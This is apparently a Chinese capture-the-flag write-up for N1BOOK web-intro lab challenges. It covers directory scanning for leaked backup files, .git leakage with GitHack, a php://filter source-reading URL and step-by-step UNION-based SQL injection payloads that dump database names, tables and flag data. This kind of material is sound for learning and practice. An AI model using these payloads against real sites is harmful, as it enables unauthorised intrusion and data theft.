第一章 web入门]常见的搜集 wp
【N1BOOK】[第一章 web入门]常见的搜集 wp
打开页面就是这样的
我们用扫一下目录得到这三个返回正常robots.txt index.php~ .index.php.swp
扫目录工具dirsearch/御剑,这里我用的是dirsearch。
我们一个个访问一下,
他说flag在/flag1_is_her3_fun.txt
,那我们就访问一下
得到第一半flag,继续访问 index.php~
得到第2半flag,继续访问 .index.php.swp,打开文件
发现第3半flag,综上就是完整的flag~
【N1BOOK】[第一章 web入门]粗心的小李 wp
考点: git泄露
工具:GitHack
下载地址: https://github.com/WangYihang/GitHacker.git
打开页面是这样的
使用GitHack,python GitHack.py http://648cad17-6be7-4e3b-a1e8-22f3106df202.node3.buuoj.cn/.git
,得到一个index.html
打开
![在这里插入图片描述](https://img-blog.csdnimg.cn/20201126104419751.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RZSl82Mjg=,size_16,color_FFFFFF,t_70#pic_ce
【N1BOOK】[第一章 web入门]afr_1 wp)
根据题目我们知道考察的是** php://协议**
php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。
下面我们构造url,下面是通用格式
http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd
那么下面我们这道题的url就是,访问看看
http://ebe70569-0124-4999-bcec-f429d08a0485.node3.buuoj.cn/?p=php://filter/convert.base64-encode/resource=flag
得到一串base64码,去解开它
得到flag~
我记得19年的极客大挑战有道题用到了相同的知识点,详细参考 [极客大挑战 2019]Secret File wp~~
【N1BOOK】[第一章 web入门]SQL注入-1 wp
打开页面是这样的,通过url发现请求方式为get
先注入一个‘发现报错
确定有sql注入,继续查字段,注入1' order by 1--+
返回正常,到1' order by 4--+
的时候返回错误,说明字段数为3
继续查注入点,注入语句-1' union select 1,2,3--+
发现注入点,继续查库名,注入-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%23
得到库名,继续查表名,注入-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables where table_schema='note'%23
得到表名,继续查字段,注入-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns where table_name='fl4g'%23
得到字段名,继续爆数据,注入-1%27%20union%20select%201,2,group_concat(concat_ws(0x23,fllllag)) from note.fl4g%23
爆出数据,得到flag~
就是简单的Union注入&